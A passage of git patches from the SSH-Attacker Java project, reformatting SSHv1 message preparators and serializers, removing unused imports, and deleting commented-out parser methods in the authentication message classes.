MessageIdConstantSSH1.SSH_MSG_CHANNEL_OPEN_FAILURE); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java index 25fbe344c..262ff1dbb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class PortForwardRequestMessageSSHV1Preparator extends SshMessagePreparator { +public class PortForwardRequestMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public PortForwardRequestMessageSSHV1Preparator(Chooser chooser, PortForwardRequestMessageSSH1 message) { + public PortForwardRequestMessageSSHV1Preparator( + Chooser chooser, PortForwardRequestMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_PORT_FORWARD_REQUEST); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java index 782403765..23f6d97bc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java index b2d26acf4..abd8f2712 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class RsaAuthMessageChallengeSSHV1Preparator extends SshMessagePreparator { +public class RsaAuthMessageChallengeSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public RsaAuthMessageChallengeSSHV1Preparator(Chooser chooser, RsaAuthChallengeMessageSSH1 message) { + public RsaAuthMessageChallengeSSHV1Preparator( + Chooser chooser, RsaAuthChallengeMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_AUTH_RSA_CHALLENGE); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java index 29cab3b74..d197130dc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java index 4d844c864..6589313b8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java index e0adc6c3b..d11e57c5d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java index 2011e42f2..016d380b8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java @@ -9,15 +9,16 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class AgentRequestForwardingMessageSSHV1Serializier extends SshMessageSerializer { +public class AgentRequestForwardingMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - public AgentRequestForwardingMessageSSHV1Serializier(AgentRequestForwardingMessageSSH1 message) { + public AgentRequestForwardingMessageSSHV1Serializier( + AgentRequestForwardingMessageSSH1 message) { super(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java index 7bd7b9e20..7b805a265 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java @@ -10,15 +10,16 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelCloseConfirmationMessageSSHV1Serializier extends SshMessageSerializer { +public class ChannelCloseConfirmationMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelCloseConfirmationMessageSSHV1Serializier(ChannelCloseConfirmationMessageSSH1 message) { + public ChannelCloseConfirmationMessageSSHV1Serializier( + ChannelCloseConfirmationMessageSSH1 message) { super(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java index 2e89a1052..d4ed78f8c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelCloseMessageSSHV1Serializier extends SshMessageSerializer { +public class ChannelCloseMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java index 7e1c22a32..f08234e4a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - -public class ChannelDataMessageSSHV1Serializier extends SshMessageSerializer { +public class ChannelDataMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -25,7 +24,10 @@ public ChannelDataMessageSSHV1Serializier(ChannelDataMessageSSH1 message) { } private void serializeExitStatus() { - LOGGER.debug("Failed Sending data on channel {} with data {}", message.getRemoteChannel().getValue(),message.getData().getValue()); + LOGGER.debug( + "Failed Sending data on channel {} with data {}", + message.getRemoteChannel().getValue(), + message.getData().getValue()); appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); appendInt(message.getData().getValue().length(), DataFormatConstants.UINT32_SIZE); appendString(message.getData().getValue(), StandardCharsets.UTF_8); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java index 2764728e5..05747aa95 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java @@ -10,15 +10,16 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenConfirmationMessageSSHV1Serializier extends SshMessageSerializer { +public class ChannelOpenConfirmationMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenConfirmationMessageSSHV1Serializier(ChannelOpenConfirmationMessageSSH1 message) { + public ChannelOpenConfirmationMessageSSHV1Serializier( + ChannelOpenConfirmationMessageSSH1 message) { super(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java index 1275d57d3..917deac2e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenFailureMessageSSHV1Serializier extends SshMessageSerializer { +public class ChannelOpenFailureMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java index 1ebe7066a..c7c1cb52d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - -public class PortForwardRequestMessageSSHV1Serializier extends SshMessageSerializer { +public class PortForwardRequestMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -25,7 +24,11 @@ public PortForwardRequestMessageSSHV1Serializier(PortForwardRequestMessageSSH1 m } private void serializeExitStatus() { - LOGGER.debug("Forwarding {} to {}:{}", message.getServerPort().getValue(),message.getHostToConnect().getValue(),message.getPortToConnect().getValue()); + LOGGER.debug( + "Forwarding {} to {}:{}", + message.getServerPort().getValue(), + message.getHostToConnect().getValue(), + message.getPortToConnect().getValue()); appendInt(message.getServerPort().getValue(), DataFormatConstants.UINT32_SIZE); appendInt(message.getHostToConnect().getValue().length(), DataFormatConstants.UINT32_SIZE); appendString(message.getHostToConnect().getValue(), StandardCharsets.UTF_8); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java index 59574b02d..face6b8b1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class PortOpenMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -25,12 +23,18 @@ public PortOpenMessageSSHV1Serializier(PortOpenMessageSSH1 message) { } private void serializeExitStatus() { - LOGGER.warn("Opening Port {} to {} on Channel {} with originator_string{}", message.getPort().getValue(), message.getHostName().getValue(),message.getLocalChannel().getValue(), message.getOriginatorString()); + LOGGER.warn( + "Opening Port {} to {} on Channel {} with originator_string{}", + message.getPort().getValue(), + message.getHostName().getValue(), + message.getLocalChannel().getValue(), + message.getOriginatorString()); appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); appendInt(message.getHostName().getValue().length(), DataFormatConstants.UINT32_SIZE); appendString(message.getHostName().getValue(), StandardCharsets.UTF_8); appendInt(message.getPort().getValue(), DataFormatConstants.UINT32_SIZE); - appendInt(message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendInt( + message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); appendString(message.getOriginatorString().getValue(), StandardCharsets.UTF_8); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java index 07b15f582..f3d6d9c2c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class RsaAuthChallengeMessageSSHV1Serializier extends SshMessageSerializer { +public class RsaAuthChallengeMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java index c8b062cf6..f5b2b482d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java @@ -8,7 +8,6 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java index e97bda2ce..3324a0600 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class X11OpenMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -25,9 +23,13 @@ public X11OpenMessageSSHV1Serializier(X11OpenMessageSSH1 message) { } private void serializeExitStatus() { - LOGGER.debug("Failed Sending data on channel {} with data {}", message.getLocalChannel().getValue(),message.getOriginatorString().getValue()); + LOGGER.debug( + "Failed Sending data on channel {} with data {}", + message.getLocalChannel().getValue(), + message.getOriginatorString().getValue()); appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); - appendInt(message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); + appendInt( + message.getOriginatorString().getValue().length(), DataFormatConstants.UINT32_SIZE); appendString(message.getOriginatorString().getValue(), StandardCharsets.UTF_8); } From 7fa3b913663c3de765bbeb0c125896874240487a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 14:58:28 +0100 Subject: [PATCH 149/176] Comment Cleanup --- .../message/UserAuthFailureMessage.java | 10 ---------- .../message/UserAuthHostbasedMessage.java | 11 ----------- .../message/UserAuthInfoRequestMessage.java | 9 --------- .../message/UserAuthInfoResponseMessage.java | 11 ----------- .../UserAuthKeyboardInteractiveMessage.java | 9 --------- .../message/UserAuthNoneMessage.java | 11 ----------- .../message/UserAuthPasswordMessage.java | 11 ----------- .../message/UserAuthPkOkMessage.java | 9 --------- .../message/UserAuthPubkeyMessage.java | 10 ---------- .../message/UserAuthSuccessMessage.java | 10 ---------- .../message/UserAuthUnknownMessage.java | 10 ---------- .../parser/UserAuthBannerMessageParser.java | 17 +---------------- .../parser/UserAuthFailureMessageParser.java | 14 -------------- .../parser/UserAuthHostbasedMessageParser.java | 16 ---------------- .../UserAuthInfoRequestMessageParser.java | 17 ----------------- .../UserAuthInfoResponseMessageParser.java | 15 --------------- ...serAuthKeyboardInteractiveMessageParser.java | 16 ---------------- .../parser/UserAuthNoneMessageParser.java | 15 --------------- .../parser/UserAuthPasswordMessageParser.java | 17 ----------------- .../parser/UserAuthPkOkMessageParser.java | 16 ---------------- .../parser/UserAuthPubkeyMessageParser.java | 16 ---------------- .../parser/UserAuthRequestMessageParser.java | 7 ------- .../parser/UserAuthSuccessMessageParser.java | 16 ---------------- .../parser/UserAuthUnknownMessageParser.java | 16 ---------------- 24 files changed, 1 insertion(+), 308 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java index e6e51af35..15b5ac538 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java @@ -137,16 +137,6 @@ public UserAuthFailureMessageParser getParser(SshContext context, InputStream st return new UserAuthFailureMessageParser(stream); } - /*@Override - public UserAuthFailureMessageParser getParser(byte[] array) { - return new UserAuthFailureMessageParser(array); - } - - @Override - public UserAuthFailureMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthFailureMessageParser(array, startPosition); - }*/ - @Override public UserAuthFailureMessagePreparator getPreparator(SshContext context) { return new UserAuthFailureMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java index e33b32a6a..d91caf36b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java @@ -275,17 +275,6 @@ public UserAuthHostbasedMessageParser getParser(SshContext context, InputStream return new UserAuthHostbasedMessageParser(stream); } - /* - @Override - public UserAuthHostbasedMessageParser getParser(byte[] array) { - return new UserAuthHostbasedMessageParser(array); - } - - @Override - public UserAuthHostbasedMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthHostbasedMessageParser(array, startPosition); - }*/ - @Override public UserAuthHostbasedMessagePreparator getPreparator(SshContext context) { return new UserAuthHostbasedMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java index 0ffcd25ac..b061ce23c 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java @@ -182,15 +182,6 @@ public UserAuthInfoRequestMessageHandler getHandler(SshContext context) { public UserAuthInfoRequestMessageParser getParser(SshContext context, InputStream stream) { return new UserAuthInfoRequestMessageParser(stream); } - /*@Override - public UserAuthInfoRequestMessageParser getParser(byte[] array) { - return new UserAuthInfoRequestMessageParser(array); - } - - @Override - public UserAuthInfoRequestMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthInfoRequestMessageParser(array, startPosition); - }*/ @Override public UserAuthInfoRequestMessagePreparator getPreparator(SshContext context) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java index fa9dd6b7e..1e6704973 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java @@ -55,17 +55,6 @@ public UserAuthInfoResponseMessageParser getParser(SshContext context, InputStre return new UserAuthInfoResponseMessageParser(stream); } - /* - @Override - public UserAuthInfoResponseMessageParser getParser(byte[] array) { - return new UserAuthInfoResponseMessageParser(array); - } - - @Override - public UserAuthInfoResponseMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthInfoResponseMessageParser(array, startPosition); - }*/ - @Override public UserAuthInfoResponseMessagePreparator getPreparator(SshContext context) { return new UserAuthInfoResponseMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java index d5546f610..4c6888e88 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthKeyboardInteractiveMessage.java @@ -116,15 +116,6 @@ public UserAuthKeyboardInteractiveMessageParser getParser( SshContext context, InputStream stream) { return new UserAuthKeyboardInteractiveMessageParser(stream); } - /*@Override - public UserAuthKeyboardInteractiveMessageParser getParser(byte[] array) { - return new UserAuthKeyboardInteractiveMessageParser(array); - } - - @Override - public 